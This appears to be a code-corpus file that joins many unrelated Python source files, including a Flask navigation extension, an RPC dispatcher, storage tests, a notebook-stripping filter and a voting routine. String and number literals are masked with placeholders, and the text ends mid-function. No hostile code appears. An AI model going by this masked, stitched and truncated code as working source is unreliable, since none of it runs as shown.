def get_auth_from_conf(here):
    """Read the Transifex username/password from the config file next to
    this script; exit with a message when the file or keys are missing."""
    transifex_conf = os.path.join(here, '<STR_LIT>')
    config = ConfigParser()
    try:
        with open(transifex_conf, '<STR_LIT:r>') as conf:
            config.readfp(conf)
    except IOError as ex:
        sys.exit('<STR_LIT>'
                 '<STR_LIT>'.format(ex))
    try:
        username = config.get('<STR_LIT>', '<STR_LIT:username>')
        password = config.get('<STR_LIT>', '<STR_LIT:password>')
    except (NoOptionError, NoSectionError) as ex:
        sys.exit('<STR_LIT>'.format(ex))
    return username, password


if __name__ == '<STR_LIT:__main__>':
    here = os.path.abspath(os.path.dirname(__file__))
    username, password = get_auth_from_conf(here)
    for language in LANGUAGES:
        fetch_po_for(language, username, password)
<s> """<STR_LIT>""" <EOL> import re <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> _plural_tags = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _fallback_tag = '<STR_LIT>' <EOL> class PluralRule ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , rules ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rules , dict ) : <EOL> rules = rules . items ( ) <EOL> found = set ( ) <EOL> self . abstract = [ ] <EOL> for key , expr in rules : <EOL> if key not in _plural_tags : <EOL> raise ValueError ( '<STR_LIT>' % key ) <EOL> elif key in found : <EOL> raise ValueError ( '<STR_LIT>' % key ) <EOL> found . add ( key ) <EOL> self . abstract . append ( ( key , _Parser ( expr ) . ast ) ) <EOL> def __repr__ ( self ) : <EOL> rules = self . rules <EOL> return '<STR_LIT>' % ( <EOL> type ( self ) . __name__ , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( tag , rules [ tag ] ) for tag in _plural_tags <EOL> if tag in rules ] ) <EOL> ) <EOL> def parse ( cls , rules ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rules , cls ) : <EOL> return rules <EOL> return cls ( rules ) <EOL> parse = classmethod ( parse ) <EOL> def rules ( self ) : <EOL> """<STR_LIT>""" <EOL> _compile = _UnicodeCompiler ( ) . compile <EOL> return dict ( [ ( tag , _compile ( ast ) ) for tag , ast in self . abstract ] ) <EOL> rules = property ( rules , doc = rules . __doc__ ) <EOL> tags = property ( lambda x : frozenset ( [ i [ <NUM_LIT:0> ] for i in x . abstract ] ) , doc = """<STR_LIT>""" ) <EOL> def __getstate__ ( self ) : <EOL> return self . abstract <EOL> def __setstate__ ( self , abstract ) : <EOL> self . abstract = abstract <EOL> def __call__ ( self , n ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _func = to_python ( self ) <EOL> return self . 
_func ( n ) <EOL> def to_javascript ( rule ) : <EOL> """<STR_LIT>""" <EOL> to_js = _JavaScriptCompiler ( ) . compile <EOL> result = [ '<STR_LIT>' ] <EOL> for tag , ast in PluralRule . parse ( rule ) . abstract : <EOL> result . append ( '<STR_LIT>' % ( to_js ( ast ) , tag ) ) <EOL> result . append ( '<STR_LIT>' % _fallback_tag ) <EOL> return '<STR_LIT>' . join ( result ) <EOL> def to_python ( rule ) : <EOL> """<STR_LIT>""" <EOL> namespace = { <EOL> '<STR_LIT>' : in_range , <EOL> '<STR_LIT>' : within_range , <EOL> '<STR_LIT>' : cldr_modulo <EOL> } <EOL> to_python = _PythonCompiler ( ) . compile <EOL> result = [ '<STR_LIT>' ] <EOL> for tag , ast in PluralRule . parse ( rule ) . abstract : <EOL> result . append ( '<STR_LIT>' % ( to_python ( ast ) , tag ) ) <EOL> result . append ( '<STR_LIT>' % _fallback_tag ) <EOL> exec '<STR_LIT:\n>' . join ( result ) in namespace <EOL> return namespace [ '<STR_LIT>' ] <EOL> def to_gettext ( rule ) : <EOL> """<STR_LIT>""" <EOL> rule = PluralRule . parse ( rule ) <EOL> used_tags = rule . tags | set ( [ _fallback_tag ] ) <EOL> _compile = _GettextCompiler ( ) . compile <EOL> _get_index = [ tag for tag in _plural_tags if tag in used_tags ] . index <EOL> result = [ '<STR_LIT>' % len ( used_tags ) ] <EOL> for tag , ast in rule . abstract : <EOL> result . append ( '<STR_LIT>' % ( _compile ( ast ) , _get_index ( tag ) ) ) <EOL> result . append ( '<STR_LIT>' % _get_index ( _fallback_tag ) ) <EOL> return '<STR_LIT>' . 
join ( result ) <EOL> def in_range ( num , min , max ) : <EOL> """<STR_LIT>""" <EOL> return num == int ( num ) and within_range ( num , min , max ) <EOL> def within_range ( num , min , max ) : <EOL> """<STR_LIT>""" <EOL> return num >= min and num <= max <EOL> def cldr_modulo ( a , b ) : <EOL> """<STR_LIT>""" <EOL> reverse = <NUM_LIT:0> <EOL> if a < <NUM_LIT:0> : <EOL> a *= - <NUM_LIT:1> <EOL> reverse = <NUM_LIT:1> <EOL> if b < <NUM_LIT:0> : <EOL> b *= - <NUM_LIT:1> <EOL> rv = a % b <EOL> if reverse : <EOL> rv *= - <NUM_LIT:1> <EOL> return rv <EOL> class RuleError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class _Parser ( object ) : <EOL> """<STR_LIT>""" <EOL> _rules = [ <EOL> ( None , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:value>' , re . compile ( r'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , re . compile ( r'<STR_LIT>' ) ) <EOL> ] <EOL> def __init__ ( self , string ) : <EOL> string = string . lower ( ) <EOL> result = [ ] <EOL> pos = <NUM_LIT:0> <EOL> end = len ( string ) <EOL> while pos < end : <EOL> for tok , rule in self . _rules : <EOL> match = rule . match ( string , pos ) <EOL> if match is not None : <EOL> pos = match . end ( ) <EOL> if tok : <EOL> result . append ( ( tok , match . group ( ) ) ) <EOL> break <EOL> else : <EOL> raise RuleError ( '<STR_LIT>' <EOL> '<STR_LIT>' % string [ pos ] ) <EOL> self . tokens = result [ : : - <NUM_LIT:1> ] <EOL> self . ast = self . condition ( ) <EOL> if self . tokens : <EOL> raise RuleError ( '<STR_LIT>' % <EOL> self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> def test ( self , type , value = None ) : <EOL> return self . tokens and self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] == type and ( value is None or self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] == value ) <EOL> def skip ( self , type , value = None ) : <EOL> if self . test ( type , value ) : <EOL> return self . tokens . 
pop ( ) <EOL> def expect ( self , type , value = None , term = None ) : <EOL> token = self . skip ( type , value ) <EOL> if token is not None : <EOL> return token <EOL> if term is None : <EOL> term = repr ( value is None and type or value ) <EOL> if not self . tokens : <EOL> raise RuleError ( '<STR_LIT>' % term ) <EOL> raise RuleError ( '<STR_LIT>' % ( term , self . tokens [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) ) <EOL> def condition ( self ) : <EOL> op = self . and_condition ( ) <EOL> while self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' , ( op , self . and_condition ( ) ) <EOL> return op <EOL> def and_condition ( self ) : <EOL> op = self . relation ( ) <EOL> while self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> op = '<STR_LIT>' , ( op , self . relation ( ) ) <EOL> return op <EOL> def relation ( self ) : <EOL> left = self . expr ( ) <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . skip ( '<STR_LIT>' , '<STR_LIT>' ) and '<STR_LIT>' or '<STR_LIT>' , ( left , self . value ( ) ) <EOL> negated = self . skip ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> method = '<STR_LIT>' <EOL> else : <EOL> self . expect ( '<STR_LIT>' , '<STR_LIT>' , term = "<STR_LIT>" ) <EOL> rv = '<STR_LIT>' , ( method , left , self . range ( ) ) <EOL> if negated : <EOL> rv = '<STR_LIT>' , ( rv , ) <EOL> return rv <EOL> def range ( self ) : <EOL> left = self . value ( ) <EOL> self . expect ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' , ( left , self . value ( ) ) <EOL> def expr ( self ) : <EOL> self . expect ( '<STR_LIT>' , '<STR_LIT:n>' ) <EOL> if self . skip ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' , ( ( '<STR_LIT:n>' , ( ) ) , self . value ( ) ) <EOL> return '<STR_LIT:n>' , ( ) <EOL> def value ( self ) : <EOL> return '<STR_LIT:value>' , ( int ( self . 
expect ( '<STR_LIT:value>' ) [ <NUM_LIT:1> ] ) , ) <EOL> def _binary_compiler ( tmpl ) : <EOL> """<STR_LIT>""" <EOL> return lambda self , l , r : tmpl % ( self . compile ( l ) , self . compile ( r ) ) <EOL> def _unary_compiler ( tmpl ) : <EOL> """<STR_LIT>""" <EOL> return lambda self , x : tmpl % self . compile ( x ) <EOL> class _Compiler ( object ) : <EOL> """<STR_LIT>""" <EOL> def compile ( self , ( op , args ) ) : <EOL> return getattr ( self , '<STR_LIT>' + op ) ( * args ) <EOL> compile_n = lambda x : '<STR_LIT:n>' <EOL> compile_value = lambda x , v : str ( v ) <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_not = _unary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_is = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_isnot = _binary_compiler ( '<STR_LIT>' ) <EOL> def compile_relation ( self , method , expr , range ) : <EOL> range = '<STR_LIT>' % tuple ( map ( self . compile , range [ <NUM_LIT:1> ] ) ) <EOL> return '<STR_LIT>' % ( method . upper ( ) , self . compile ( expr ) , range ) <EOL> class _PythonCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_not = _unary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> class _GettextCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> def compile_relation ( self , method , expr , range ) : <EOL> expr = self . compile ( expr ) <EOL> min , max = map ( self . compile , range [ <NUM_LIT:1> ] ) <EOL> return '<STR_LIT>' % ( expr , min , expr , max ) <EOL> class _JavaScriptCompiler ( _GettextCompiler ) : <EOL> """<STR_LIT>""" <EOL> def compile_relation ( self , method , expr , range ) : <EOL> code = _GettextCompiler . compile_relation ( self , method , expr , range ) <EOL> if method == '<STR_LIT>' : <EOL> expr = self . 
compile ( expr ) <EOL> code = '<STR_LIT>' % ( expr , expr , code ) <EOL> return code <EOL> class _UnicodeCompiler ( _Compiler ) : <EOL> """<STR_LIT>""" <EOL> compile_is = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_isnot = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_and = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_or = _binary_compiler ( '<STR_LIT>' ) <EOL> compile_mod = _binary_compiler ( '<STR_LIT>' ) <EOL> def compile_not ( self , relation ) : <EOL> return self . compile_relation ( negated = True , * relation [ <NUM_LIT:1> ] ) <EOL> def compile_relation ( self , method , expr , range , negated = False ) : <EOL> return '<STR_LIT>' % ( <EOL> self . compile ( expr ) , negated and '<STR_LIT>' or '<STR_LIT>' , <EOL> method , '<STR_LIT>' % tuple ( map ( self . compile , range [ <NUM_LIT:1> ] ) ) <EOL> ) </s>
def test_package_importable():
    """Smoke test: the package must import without error."""
    import flask_appconfig  # noqa: F401 -- the import itself is the assertion
import collections
from importlib import import_module
import re

# ``MutableMapping`` lives in ``collections.abc`` on Python 3; the bare
# ``collections`` alias was removed in 3.10.  Resolve once, compatibly.
try:
    _MutableMapping = collections.abc.MutableMapping
except AttributeError:  # pragma: no cover - Python 2
    _MutableMapping = collections.MutableMapping


def register_renderer(app, id, renderer, force=True):
    """Register ``renderer`` under ``id`` on the app.

    When ``force`` is false an existing registration wins.
    """
    renderers = app.extensions.setdefault('<STR_LIT>', {})
    if force:
        renderers[id] = renderer
    else:
        renderers.setdefault(id, renderer)


def get_renderer(app, id):
    """Look up a renderer; a ``(module, dotted_attr)`` tuple is resolved
    lazily by importing the module and walking the attribute path."""
    renderer = app.extensions.get('<STR_LIT>', {})[id]
    if isinstance(renderer, tuple):
        mod_name, cls_name = renderer
        mod = import_module(mod_name)
        cls = mod
        for name in cls_name.split('<STR_LIT:.>'):
            cls = getattr(cls, name)
        return cls
    return renderer


class NavbarRenderingError(Exception):
    pass


class ElementRegistry(_MutableMapping):
    """Mapping of element id -> element; callable values are invoked on
    access so elements can be built lazily per request."""

    def __init__(self):
        self._elems = {}

    def __getitem__(self, key):
        item = self._elems[key]
        if callable(item):
            try:
                return item()
            except Exception as e:
                raise NavbarRenderingError('<STR_LIT>'.format(e))
        return item

    def __setitem__(self, key, value):
        self._elems[key] = value

    def __delitem__(self, key):
        del self._elems[key]

    def __iter__(self):
        # BUG FIX: the original looped ``for key in self._elems.keys():
        # return self[key]`` which returned the first *resolved element*
        # instead of an iterator over keys, breaking iteration and every
        # MutableMapping mixin that relies on it.
        return iter(self._elems)

    def __len__(self):
        return len(self._elems)


class Nav(object):
    """Flask extension object holding navigation elements and renderers."""

    def __init__(self, app=None):
        self.elems = ElementRegistry()
        # Default renderer spec: (module_name, attribute) tuple resolved
        # lazily by get_renderer().
        simple = __name__ + '<STR_LIT>', '<STR_LIT>'
        self._renderers = [
            ('<STR_LIT>', simple),
            (None, simple, False),
        ]
        if app:
            self.init_app(app)

    def init_app(self, app):
        """Wire this extension into ``app``: expose the element registry as
        a template global and register the known renderers."""
        if not hasattr(app, '<STR_LIT>'):
            app.extensions = {}
        app.extensions['<STR_LIT>'] = self
        app.add_template_global(self.elems, '<STR_LIT>')
        for args in self._renderers:
            register_renderer(app, *args)

    def navigation(self, id=None):
        """Decorator registering the decorated callable as a nav element
        under ``id`` (defaults to the function's name)."""
        def wrapper(f):
            self.register_element(id or f.__name__, f)
            return f
        return wrapper

    def register_element(self, id, elem):
        """Register ``elem`` (a value or a zero-argument callable)."""
        self.elems[id] = elem

    def renderer(self, id=None, force=True):
        """Class decorator queueing a renderer for registration; the default
        id is the CamelCase class name converted to snake-ish lowercase."""
        def _(cls):
            name = cls.__name__
            sn = name[0] + re.sub(r'<STR_LIT>', r'<STR_LIT>', name[1:])
            self._renderers.append((id or sn.lower(), cls, force))
            return cls
        return _
import os

from tempdir import TempDir
import pytest

# Skip this whole module when boto is not installed.
boto = pytest.importorskip('<STR_LIT>')

from simplekv.net.botostore import BotoStore
from simplekv._compat import BytesIO
from basic_store import BasicStore
from url_store import UrlStore
from bucket_manager import boto_credentials, boto_bucket


@pytest.fixture(params=boto_credentials,
                ids=[c['<STR_LIT>'] for c in boto_credentials])
def credentials(request):
    return request.param


@pytest.yield_fixture()
def bucket(credentials):
    with boto_bucket(**credentials) as bucket:
        yield bucket


class TestBotoStorage(BasicStore, UrlStore):
    @pytest.fixture(params=[True, False])
    def reduced_redundancy(self, request):
        return request.param

    @pytest.fixture
    def storage_class(self, reduced_redundancy):
        # Expected S3 storage class string for the chosen redundancy mode.
        return '<STR_LIT>' if reduced_redundancy else '<STR_LIT>'

    @pytest.fixture(params=['<STR_LIT>', '<STR_LIT>'])
    def prefix(self, request):
        return request.param

    @pytest.fixture
    def store(self, bucket, prefix, reduced_redundancy):
        return BotoStore(bucket, prefix, reduced_redundancy=reduced_redundancy)

    # NOTE(review): this test and the next one are byte-identical duplicates;
    # kept both to preserve the suite's surface.
    def test_get_filename_nonexistant(self, store, key):
        with TempDir() as tmpdir, pytest.raises(KeyError):
            store.get_file(key, os.path.join(tmpdir, '<STR_LIT:a>'))

    def test_key_error_on_nonexistant_get_filename(self, store, key):
        with TempDir() as tmpdir, pytest.raises(KeyError):
            store.get_file(key, os.path.join(tmpdir, '<STR_LIT:a>'))

    def test_storage_class_put(
        self, store, prefix, key, value, storage_class, bucket
    ):
        store.put(key, value)
        full_key = prefix + key
        if storage_class != '<STR_LIT>':
            pytest.xfail('<STR_LIT>')
        assert bucket.lookup(full_key).storage_class == storage_class

    def test_storage_class_putfile(
        self, store, prefix, key, value, storage_class, bucket
    ):
        store.put_file(key, BytesIO(value))
        full_key = prefix + key
        if storage_class != '<STR_LIT>':
            pytest.xfail('<STR_LIT>')
        assert bucket.lookup(full_key).storage_class == storage_class
import six
import inspect

from ..exc import *


def public(name=None):
    """Decorator marking a function as RPC-public.

    Used bare (``@public``) it tags the function under its own name; called
    with a string (``@public('x')``) it tags it under that name.
    """
    if callable(name):
        f = name
        f._rpc_public_name = f.__name__
        return f

    def _(f):
        f._rpc_public_name = name or f.__name__
        return f
    return _


class RPCDispatcher(object):
    """Maps RPC method names to callables, with prefixed sub-dispatchers."""

    def __init__(self):
        self.method_map = {}
        self.subdispatchers = {}

    def add_subdispatch(self, dispatcher, prefix='<STR_LIT>'):
        """Attach ``dispatcher`` to handle names starting with ``prefix``."""
        self.subdispatchers.setdefault(prefix, []).append(dispatcher)

    def add_method(self, f, name=None):
        """Register callable ``f`` under ``name`` (default: its __name__).

        Raises RPCError on a duplicate registration.
        """
        assert callable(f), "<STR_LIT>"
        if not name:
            name = f.__name__
        if name in self.method_map:
            raise RPCError('<STR_LIT>')
        self.method_map[name] = f

    def dispatch(self, request):
        """Dispatch a single request or a batch (detected by attribute).

        Returns the (batch) response, or None for notification-only batches.
        """
        if hasattr(request, '<STR_LIT>'):
            results = [self._dispatch(req) for req in request]
            response = request.create_batch_response()
            # FIX: ``is not None`` instead of ``!= None`` -- identity test
            # for the singleton (PEP 8), avoids invoking __ne__.
            if response is not None:
                response.extend(results)
            return response
        else:
            return self._dispatch(request)

    def _dispatch(self, request):
        # Outer try is a last-resort guard: any unexpected failure is
        # reported as a generic ServerError rather than propagating.
        try:
            try:
                method = self.get_method(request.method)
            except KeyError as e:
                return request.error_respond(MethodNotFoundError(e))
            try:
                result = method(*request.args, **request.kwargs)
            except Exception as e:
                # Errors raised by the method itself go back to the caller.
                return request.error_respond(e)
            return request.respond(result)
        except Exception:
            return request.error_respond(ServerError())

    def get_method(self, name):
        """Resolve ``name`` locally, then in prefix-matching sub-dispatchers
        (with the prefix stripped).  Raises KeyError when unknown."""
        if name in self.method_map:
            return self.method_map[name]
        for prefix, subdispatchers in six.iteritems(self.subdispatchers):
            if name.startswith(prefix):
                for sd in subdispatchers:
                    try:
                        return sd.get_method(name[len(prefix):])
                    except KeyError:
                        pass
        raise KeyError(name)

    def public(self, name=None):
        """Decorator form of :meth:`add_method`, mirroring module-level
        :func:`public`."""
        if callable(name):
            self.add_method(name)
            return name

        def _(f):
            self.add_method(f, name=name)
            return f
        return _

    def register_instance(self, obj, prefix='<STR_LIT>'):
        """Expose every ``@public``-tagged member of ``obj`` under
        ``prefix`` via a fresh sub-dispatcher."""
        dispatch = self.__class__()
        for name, f in inspect.getmembers(
            obj, lambda f: callable(f) and hasattr(f, '<STR_LIT>')
        ):
            dispatch.add_method(f, f._rpc_public_name)
        self.add_subdispatch(dispatch, prefix)
from unleash import issues, info, log

PLUGIN_NAME = '<STR_LIT>'
PLUGIN_DEPENDS = ['<STR_LIT>']

_PY2_CLASSIFIER = '<STR_LIT>'
_PY3_CLASSIFIER = '<STR_LIT>'


def lint_release():
    """Warn when setup classifiers are missing entirely, or name neither
    of the two expected Python-version classifiers."""
    log.info('<STR_LIT>')
    cs = info['<STR_LIT>'].classifiers
    if not cs:
        issues.warn(
            '<STR_LIT>',
            '<STR_LIT>'
            '<STR_LIT>'
            '<STR_LIT>'
        )
    else:
        # FIX: ``x not in cs`` instead of ``not x in cs`` (PEP 8 idiom).
        if _PY2_CLASSIFIER not in cs and _PY3_CLASSIFIER not in cs:
            issues.warn(
                '<STR_LIT>',
                '<STR_LIT>'
                '<STR_LIT>')
import json
import sys

import yaml


def main(argv):
    """Read the YAML file named in argv[1], drop one top-level key, and
    print it as indented JSON.  Exits 1 with a usage message when no file
    argument is given."""
    if len(argv) < 2:
        sys.stderr.write('<STR_LIT>' % argv[0])
        sys.exit(1)
    with open(argv[1]) as yaml_input:
        data = yaml.safe_load(yaml_input)
    if '<STR_LIT>' in data:
        del data['<STR_LIT>']
    # FIX: Python 3 compatibility -- the original used the Py2-only
    # ``print expr`` statement; the parenthesized single-argument form
    # prints identically on Python 2.
    print(json.dumps(data, indent=2))


if __name__ == '<STR_LIT:__main__>':
    main(sys.argv)
import json
import os
import unittest

import vm_images


class ImageShortNameToUrlTest(unittest.TestCase):
    """Checks ImageShortNameToUrl against the PROJECT_IMAGES tables.

    Note: this is a Python 2 file (``.iteritems()``); kept as-is.
    """

    def projectImageToUrl(self, project, image):
        # Builds the expected URL directly from the format template.
        url_fmt = '<STR_LIT>'
        return url_fmt % {
            '<STR_LIT>': project,
            '<STR_LIT:image>': image,
        }

    def testDirectReferenceImages(self):
        """Every directly-listed image maps to its project URL."""
        for project, data in vm_images.PROJECT_IMAGES.iteritems():
            for image in data['<STR_LIT>']:
                self.assertEqual(
                    self.projectImageToUrl(project, image),
                    vm_images.ImageShortNameToUrl(image))

    def testPseudoImages(self):
        """Every pseudo-image alias maps to its target image's URL."""
        for project, data in vm_images.PROJECT_IMAGES.iteritems():
            # FIX: ``x not in data`` instead of ``not x in data`` (PEP 8).
            if '<STR_LIT>' not in data:
                continue
            for pseudo in data['<STR_LIT>']:
                self.assertEqual(
                    self.projectImageToUrl(project, data['<STR_LIT>'][pseudo]),
                    vm_images.ImageShortNameToUrl(pseudo))

    def testInvalid(self):
        """An unknown short name raises InvalidImageShortName."""
        self.assertRaises(
            vm_images.InvalidImageShortName,
            vm_images.ImageShortNameToUrl,
            '<STR_LIT>')


if __name__ == '<STR_LIT:__main__>':
    unittest.main()
from django.http import HttpResponse


def home(request):
    """Trivial health-check style view: always answers the same body."""
    return HttpResponse('<STR_LIT:OK>')
import unittest
import shutil
import os

from angular_scaffold.management.commands.helpers._generate_assets import generate_assets
from angular_scaffold.management.commands.helpers._generate_debugger import generate_debugger


class GenerateDebuggerTest(unittest.TestCase):
    """Exercises generate_debugger against a freshly generated asset tree."""

    def setUp(self):
        self.BASE_DIR = os.path.dirname(__file__)
        # Start from a clean slate before regenerating the scaffold.
        stale = os.path.join(self.BASE_DIR, '<STR_LIT>')
        if os.path.exists(stale):
            shutil.rmtree(stale)
        generate_assets(self.BASE_DIR, '<STR_LIT>')

    def test_debugger(self):
        generate_debugger(self.BASE_DIR, '<STR_LIT>')
        expected = [
            os.path.join(self.BASE_DIR, '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'),
            os.path.join(self.BASE_DIR, '<STR_LIT>', '<STR_LIT>'),
        ]
        for path in expected:
            self.assertTrue(os.path.exists(path))

    def tearDown(self):
        shutil.rmtree(os.path.join(self.BASE_DIR, '<STR_LIT>'))
<s> from box import BoundingBox , FloatBox <EOL> from entity import Entity , TileEntity <EOL> from faces import faceDirections , FaceXDecreasing , FaceXIncreasing , FaceYDecreasing , FaceYIncreasing , FaceZDecreasing , FaceZIncreasing , MaxDirections <EOL> from indev import MCIndevLevel <EOL> from infiniteworld import ChunkedLevelMixin , AnvilChunk , MCAlphaDimension , MCInfdevOldLevel , ZeroChunk <EOL> import items <EOL> from javalevel import MCJavaLevel <EOL> from level import ChunkBase , computeChunkHeightMap , EntityLevel , FakeChunk , LightedChunk , MCLevel <EOL> from materials import alphaMaterials , classicMaterials , indevMaterials , MCMaterials , namedMaterials , pocketMaterials <EOL> from mclevelbase import ChunkNotPresent , saveFileDir , minecraftDir , PlayerNotFound <EOL> from mclevel import fromFile , loadWorld , loadWorldNumber <EOL> from nbt import load , gunzip , TAG_Byte , TAG_Byte_Array , TAG_Compound , TAG_Double , TAG_Float , TAG_Int , TAG_Int_Array , TAG_List , TAG_Long , TAG_Short , TAG_String <EOL> import pocket <EOL> from schematic import INVEditChest , MCSchematic , ZipSchematic </s>
<s> import unittest <EOL> import numpy <EOL> from templevel import TempLevel <EOL> __author__ = '<STR_LIT>' <EOL> class TestPocket ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . level = TempLevel ( "<STR_LIT>" ) <EOL> self . alphalevel = TempLevel ( "<STR_LIT>" ) <EOL> def testPocket ( self ) : <EOL> level = self . level . level <EOL> print "<STR_LIT>" , len ( level . allChunks ) <EOL> chunk = level . getChunk ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> a = numpy . array ( chunk . SkyLight ) <EOL> chunk . dirty = True <EOL> chunk . needsLighting = True <EOL> level . generateLights ( ) <EOL> level . saveInPlace ( ) <EOL> assert ( a == chunk . SkyLight ) . all ( ) </s>
from setuptools import setup

# Package metadata; literal values are masked in this corpus.
setup(
    name='<STR_LIT>',
    version='<STR_LIT>',
    description='<STR_LIT>',
    url='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    license='<STR_LIT>',
    packages=['<STR_LIT>'],
    install_requires=[
        "<STR_LIT>",
    ],
    zip_safe=False,
)
import sys

# stdin -> stdout notebook filter: strips outputs/prompts from an IPython/
# Jupyter notebook.  Optionally mirrors its work to a debug log file.
version = None
debug = open('<STR_LIT>', '<STR_LIT>')
if debug:
    debug.write("<STR_LIT>")

# Python 2 only: force a utf-8 default encoding (guarded, so this branch
# never runs -- and never raises NameError for reload -- on Python 3).
if sys.version[0] == '<STR_LIT:2>':
    reload(sys)
    sys.setdefaultencoding('<STR_LIT:utf8>')

# Prefer the newest nbformat location, falling back through older APIs;
# the oldest ("current") API pins a fixed version string.
try:
    from jupyter_nbformat import reads, write
except ImportError:
    try:
        from IPython.nbformat import reads, write
    except ImportError:
        from IPython.nbformat.current import reads, write
        version = '<STR_LIT>'

to_parse = sys.stdin.read()

# When the API did not fix the version, sniff it from the raw JSON.
if not version:
    import json
    json_in = json.loads(to_parse)
    version = json_in['<STR_LIT>']
if debug:
    debug.write("<STR_LIT>" % (version))

json_in = reads(to_parse, version)

# Old notebooks keep cells in worksheets; new ones keep them at top level.
if hasattr(json_in, '<STR_LIT>'):
    sheets = json_in.worksheets
else:
    sheets = [json_in]

for sheet in sheets:
    for cell in sheet.cells:
        # First group of fields is emptied, second deleted, third nulled --
        # field names are masked in this corpus.
        for field in ("<STR_LIT>",):
            if field in cell:
                if debug:
                    debug.write("<STR_LIT>" % (field, cell[field]))
                cell[field] = []
        for field in ("<STR_LIT>", "<STR_LIT>",):
            if field in cell:
                del cell[field]
        for field in ("<STR_LIT>",):
            if field in cell:
                cell[field] = None

if '<STR_LIT>' in json_in.metadata:
    json_in.metadata['<STR_LIT>'] = "<STR_LIT>"

write(json_in, sys.stdout, version)
if debug:
    write(json_in, debug, version)
    debug.write("<STR_LIT>" % (json_in))
    debug.write("<STR_LIT>")
if debug:
    debug.close()
exit(0)
<s> if not request . env . web2py_runtime_gae : <EOL> db = DAL ( '<STR_LIT>' ) <EOL> else : <EOL> db = DAL ( '<STR_LIT>' ) <EOL> session . connect ( request , response , db = db ) <EOL> response . generic_patterns = [ '<STR_LIT:*>' ] if request . is_local else [ ] <EOL> from gluon . tools import Auth , Crud , Service , PluginManager , prettydate <EOL> auth = Auth ( db , hmac_key = Auth . get_or_create_key ( ) ) <EOL> crud , service , plugins = Crud ( db ) , Service ( ) , PluginManager ( ) <EOL> auth . define_tables ( ) <EOL> mail = auth . settings . mailer <EOL> mail . settings . server = '<STR_LIT>' or '<STR_LIT>' <EOL> mail . settings . sender = '<STR_LIT>' <EOL> mail . settings . login = '<STR_LIT>' <EOL> auth . settings . registration_requires_verification = False <EOL> auth . settings . registration_requires_approval = False <EOL> auth . settings . reset_password_requires_verification = True <EOL> from gluon . contrib . login_methods . rpx_account import use_janrain <EOL> use_janrain ( auth , filename = '<STR_LIT>' ) </s>
<s> import random , copy <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def makeup_votes ( nvotes = <NUM_LIT:100> , candidates = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' ] ) : <EOL> """<STR_LIT>""" <EOL> votes = [ ] <EOL> for k in range ( nvotes ) : <EOL> vote = copy . copy ( candidates ) <EOL> random . shuffle ( vote ) <EOL> votes . append ( vote ) <EOL> return votes <EOL> def is_valid ( vote ) : <EOL> """<STR_LIT>""" <EOL> return len ( vote ) == len ( set ( vote ) ) <EOL> def iro ( votes ) : <EOL> """<STR_LIT>""" <EOL> winners = [ ] <EOL> losers = set ( ) <EOL> allowed_options = reduce ( lambda a , b : a | b , [ set ( vote ) for vote in votes ] ) <EOL> n = len ( allowed_options ) <EOL> while len ( winners ) < n : <EOL> options = { } <EOL> for item in allowed_options : <EOL> if not item in losers : <EOL> options [ item ] = <NUM_LIT:0> <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> for item in vote : <EOL> if not item in losers : <EOL> options [ item ] += <NUM_LIT:1> <EOL> break <EOL> options_list = [ ( v , k ) for ( k , v ) in options . items ( ) ] <EOL> options_list . sort ( ) <EOL> minv = options_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> for ( v , k ) in options_list : <EOL> if v == minv : <EOL> losers . add ( k ) <EOL> 